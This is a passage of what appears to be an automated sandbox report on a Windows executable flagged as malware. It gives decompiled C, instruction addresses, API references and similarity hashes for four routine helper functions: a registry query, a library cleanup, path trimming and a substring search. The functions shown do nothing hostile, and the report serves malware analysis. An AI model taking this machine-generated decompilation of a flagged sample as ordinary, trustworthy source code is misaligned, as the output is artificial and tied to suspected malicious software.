                                                                                        				char* _t30;
                                                                                        
                                                                                        				asm("sbb eax, eax");
                                                                                        				_v8 = 0x800;
                                                                                        				_t21 = E004063AA(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                                                        				_t30 = _a16;
                                                                                        				if(_t21 != 0) {
                                                                                        					L4:
                                                                                        					 *_t30 =  *_t30 & 0x00000000;
                                                                                        				} else {
                                                                                        					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                                                        					_t21 = RegCloseKey(_a20);
                                                                                        					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                                                        					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                                                        						goto L4;
                                                                                        					}
                                                                                        				}
                                                                                        				return _t21;
                                                                                        			}







                                                                                        0x00406419
                                                                                        0x0040641b
                                                                                        0x00406433
                                                                                        0x00406438
                                                                                        0x0040643d
                                                                                        0x0040647b
                                                                                        0x0040647b
                                                                                        0x0040643f
                                                                                        0x00406451
                                                                                        0x0040645c
                                                                                        0x00406462
                                                                                        0x0040646d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040646d
                                                                                        0x00406481

                                                                                        APIs
                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,00406672,80000002), ref: 00406451
                                                                                        • RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsiF917.tmp\System.dll), ref: 0040645C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseQueryValue
                                                                                        • String ID: Call
                                                                                        • API String ID: 3356406503-1824292864
                                                                                        • Opcode ID: a598e195228f1036644e08b1753da052d1713cd74bd9ea8ab147b12b545f69e3
                                                                                        • Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
                                                                                        • Opcode Fuzzy Hash: a598e195228f1036644e08b1753da052d1713cd74bd9ea8ab147b12b545f69e3
                                                                                        • Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00403B57() {
                                                                                        				void* _t2;
                                                                                        				void* _t3;
                                                                                        				void* _t6;
                                                                                        				void* _t8;
                                                                                        
                                                                                        				_t8 =  *0x42b22c;
                                                                                        				_t3 = E00403B3C(_t2, 0);
                                                                                        				if(_t8 != 0) {
                                                                                        					do {
                                                                                        						_t6 = _t8;
                                                                                        						_t8 =  *_t8;
                                                                                        						FreeLibrary( *(_t6 + 8));
                                                                                        						_t3 = GlobalFree(_t6);
                                                                                        					} while (_t8 != 0);
                                                                                        				}
                                                                                        				 *0x42b22c =  *0x42b22c & 0x00000000;
                                                                                        				return _t3;
                                                                                        			}







                                                                                        0x00403b58
                                                                                        0x00403b60
                                                                                        0x00403b67
                                                                                        0x00403b6a
                                                                                        0x00403b6a
                                                                                        0x00403b6c
                                                                                        0x00403b71
                                                                                        0x00403b78
                                                                                        0x00403b7e
                                                                                        0x00403b82
                                                                                        0x00403b83
                                                                                        0x00403b8b

                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(?,77473420,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                                                                                        • GlobalFree.KERNEL32(?), ref: 00403B78
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Free$GlobalLibrary
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                        • API String ID: 1100898210-3355392842
                                                                                        • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                        • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                                                                                        • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                        • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 77%
                                                                                        			E00405E58(WCHAR* _a4) {
                                                                                        				WCHAR* _t5;
                                                                                        				WCHAR* _t7;
                                                                                        
                                                                                        				_t7 = _a4;
                                                                                        				_t5 =  &(_t7[lstrlenW(_t7)]);
                                                                                        				while( *_t5 != 0x5c) {
                                                                                        					_push(_t5);
                                                                                        					_push(_t7);
                                                                                        					_t5 = CharPrevW();
                                                                                        					if(_t5 > _t7) {
                                                                                        						continue;
                                                                                        					}
                                                                                        					break;
                                                                                        				}
                                                                                        				 *_t5 =  *_t5 & 0x00000000;
                                                                                        				return  &(_t5[1]);
                                                                                        			}





                                                                                        0x00405e59
                                                                                        0x00405e63
                                                                                        0x00405e66
                                                                                        0x00405e6c
                                                                                        0x00405e6d
                                                                                        0x00405e6e
                                                                                        0x00405e76
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405e76
                                                                                        0x00405e78
                                                                                        0x00405e80

                                                                                        APIs
                                                                                        • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe,C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00405E5E
                                                                                        • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe,C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe,80000000,00000003), ref: 00405E6E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CharPrevlstrlen
                                                                                        • String ID: C:\Users\user\Desktop
                                                                                        • API String ID: 2709904686-3370423016
                                                                                        • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                        • Instruction ID: d2786f61c86b799b8b6ecf14661ff9643eaf9d362a95097130d0805b1e4d2bc4
                                                                                        • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                        • Instruction Fuzzy Hash: 36D0A7B3410D20DAC3126718DC04DAF73ECFF6134074A442AF481A71A4D7785E8186ED
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00405F92(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                                                        				int _v8;
                                                                                        				int _t12;
                                                                                        				int _t14;
                                                                                        				int _t15;
                                                                                        				CHAR* _t17;
                                                                                        				CHAR* _t27;
                                                                                        
                                                                                        				_t12 = lstrlenA(_a8);
                                                                                        				_t27 = _a4;
                                                                                        				_v8 = _t12;
                                                                                        				while(lstrlenA(_t27) >= _v8) {
                                                                                        					_t14 = _v8;
                                                                                        					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                                                        					_t15 = lstrcmpiA(_t27, _a8);
                                                                                        					_t27[_v8] =  *(_t14 + _t27);
                                                                                        					if(_t15 == 0) {
                                                                                        						_t17 = _t27;
                                                                                        					} else {
                                                                                        						_t27 = CharNextA(_t27);
                                                                                        						continue;
                                                                                        					}
                                                                                        					L5:
                                                                                        					return _t17;
                                                                                        				}
                                                                                        				_t17 = 0;
                                                                                        				goto L5;
                                                                                        			}









                                                                                        0x00405fa2
                                                                                        0x00405fa4
                                                                                        0x00405fa7
                                                                                        0x00405fd3
                                                                                        0x00405fac
                                                                                        0x00405fb5
                                                                                        0x00405fba
                                                                                        0x00405fc5
                                                                                        0x00405fc8
                                                                                        0x00405fe4
                                                                                        0x00405fca
                                                                                        0x00405fd1
                                                                                        0x00000000
                                                                                        0x00405fd1
                                                                                        0x00405fdd
                                                                                        0x00405fe1
                                                                                        0x00405fe1
                                                                                        0x00405fdb
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBA
                                                                                        • CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 190613189-0
                                                                                        • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                        • Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
                                                                                        • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                        • Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%